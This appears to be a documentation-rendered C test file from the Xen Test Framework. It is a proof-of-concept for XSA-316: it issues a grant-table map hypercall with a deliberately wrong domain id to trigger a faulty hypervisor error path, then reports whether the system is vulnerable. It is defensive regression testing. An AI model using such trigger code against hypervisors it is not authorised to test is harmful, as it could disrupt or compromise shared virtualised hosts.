Xen Test Framework
tests
xsa-316
main.c
Go to the documentation of this file.
1
18
#include <xtf.h>
19
20
const
char
test_title
[] =
"XSA-316 PoC"
;
21
22
static
uint8_t
frame
[
PAGE_SIZE
]
__page_aligned_bss
;
23
24
void
test_main
(
void
)
25
{
26
int
rc =
xtf_init_grant_table
(1);
27
28
if
( rc )
29
return
xtf_error
(
"Error initialising grant table: %d\n"
, rc);
30
31
int
domid =
xtf_get_domid
();
32
33
if
( domid < 0 )
34
return
xtf_error
(
"Error getting domid\n"
);
35
36
/*
37
* Construct gref 8 to allow frame[] to be mapped by ourselves..
38
*/
39
gnttab_v1
[8].
domid
= domid;
40
gnttab_v1
[8].
frame
=
virt_to_gfn
(
frame
);
41
smp_wmb
();
42
gnttab_v1
[8].
flags
=
GTF_permit_access
;
43
44
struct
gnttab_map_grant_ref
map = {
45
.
host_addr
=
KB
(4),
46
.flags =
GNTMAP_host_map
,
47
.ref = 8,
48
.dom = 0,
/* .. but provide incorrect domain id to map operation. */
49
};
50
51
/*
52
* Attempt to map gref to exercise the faulty error path.
53
*/
54
rc =
hypercall_grant_table_op
(
GNTTABOP_map_grant_ref
, &map, 1);
55
if
( map.
status
> 0 )
56
return
xtf_failure
(
"Fail: Vulnerable to XSA-316\n"
);
57
else
if
( !rc && map.
status
==
GNTST_general_error
)
58
return
xtf_success
(
"Success: Not vulnerable to XSA-316\n"
);
59
else
60
return
xtf_error
(
"Error: Unexpected result: %d/%d\n"
, rc, map.
status
);
61
}
62
63
/*
64
* Local variables:
65
* mode: C
66
* c-file-style: "BSD"
67
* c-basic-offset: 4
68
* tab-width: 4
69
* indent-tabs-mode: nil
70
* End:
71
*/
gnttab_map_grant_ref::host_addr
uint64_t host_addr
Definition:
grant_table.h:226
GNTST_general_error
#define GNTST_general_error
Definition:
grant_table.h:11
frame
static uint8_t frame[PAGE_SIZE]
Definition:
main.c:22
__page_aligned_bss
#define __page_aligned_bss
Definition:
compiler.h:37
GNTMAP_host_map
#define GNTMAP_host_map
Definition:
grant_table.h:179
smp_wmb
#define smp_wmb()
Definition:
barrier.h:36
xtf_get_domid
int xtf_get_domid(void)
Obtain the current domid.
Definition:
lib.c:47
grant_entry_v1_t::frame
uint32_t frame
Definition:
grant_table.h:117
xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition:
report.c:38
KB
#define KB(num)
Express num in Kilobytes.
Definition:
numbers.h:23
gnttab_map_grant_ref
Definition:
grant_table.h:224
xtf_failure
void xtf_failure(const char *fmt,...)
Report a test failure.
Definition:
report.c:94
test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition:
main.c:137
virt_to_gfn
static unsigned long virt_to_gfn(const void *va)
Definition:
mm.h:100
gnttab_map_grant_ref::status
int16_t status
Definition:
grant_table.h:231
xtf_init_grant_table
int xtf_init_grant_table(unsigned int version)
Initialise XTF's grant infrastructure.
Definition:
grant_table.c:21
test_title
const char test_title[]
The title of the test.
Definition:
main.c:14
grant_entry_v1_t::domid
domid_t domid
Definition:
grant_table.h:110
PAGE_SIZE
#define PAGE_SIZE
Definition:
page.h:11
gnttab_v1
grant_entry_v1_t gnttab_v1[]
xtf_error
void xtf_error(const char *fmt,...)
Report a test error.
Definition:
report.c:80
hypercall_grant_table_op
static long hypercall_grant_table_op(unsigned int cmd, void *args, unsigned int count)
Definition:
hypercall.h:131
grant_entry_v1_t::flags
uint16_t flags
Definition:
grant_table.h:108
GTF_permit_access
#define GTF_permit_access
Definition:
grant_table.h:50
uint8_t
__UINT8_TYPE__ uint8_t
Definition:
stdint.h:14
GNTTABOP_map_grant_ref
#define GNTTABOP_map_grant_ref
Definition:
grant_table.h:223
Generated by
1.8.13
